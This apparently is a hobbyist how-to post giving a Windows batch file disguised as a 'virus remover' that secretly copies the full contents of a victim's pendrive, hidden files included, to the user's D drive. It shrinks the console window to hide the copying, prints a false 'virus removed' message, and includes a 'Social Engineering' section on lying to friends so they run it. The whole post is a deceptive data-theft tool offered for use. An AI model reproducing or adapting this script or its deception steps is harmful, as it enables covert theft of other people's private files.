Secretly Copy Data From Pendrive to Pc.

by Roshan the innovator in Circuits > Computers

13127 Views, 76 Favorites, 0 Comments

Secretly Copy Data From Pendrive to Pc.

IMG_20130624_162722.jpg

hello guys..!

today i'm gonna show you how to secretly copy the data from pendrive to pc.......!

I have posted this instructable becoz........I had a situation that I have to copy the data from pendrive to computer secretly,,,,,, ok but after a lot of difficulties I copied the data.....then I decided to make a batch file to secretly copy the data..........!

Coding

open notepad and copy the below code....

@echo off

title virus remover

md copied

color 2a

Echo.enter the drive letter u want to scan the virus.

set /p fg=

mode con: cols=30 lines=01

xcopy %fg%:\ /s/h d:\copied

pause

echo. virus removed completely...

exit

save it as copy.bat

important:-

select all files in file types while saving !

You have to copy this file to d drive...

Social Engineering

You have to tell you friends that it is a virus remover software

and we have to use it to remove virus in your pendrive

and we have to wait some time to remove virus....!

How to Use It

Untitled.png

I have done coding in such a way that the copying process don't appear...... as shown in pic above........!

steps :-

1. just open the batch file you just have created in the local drive D (you may also create a shortcut on to the desktop and make it look good by changing its icon)

2. then it asks to enter the label of the drive (label of the pendrive or dvd ) which we want to copy

3. then enter the drive letter, it may be E or F etc

4. then the data will be copied to the folder named "copied" in the "local drive d"

...........................thankyou..........................

If you have suggestions or comments about this instructable........

comment plz...............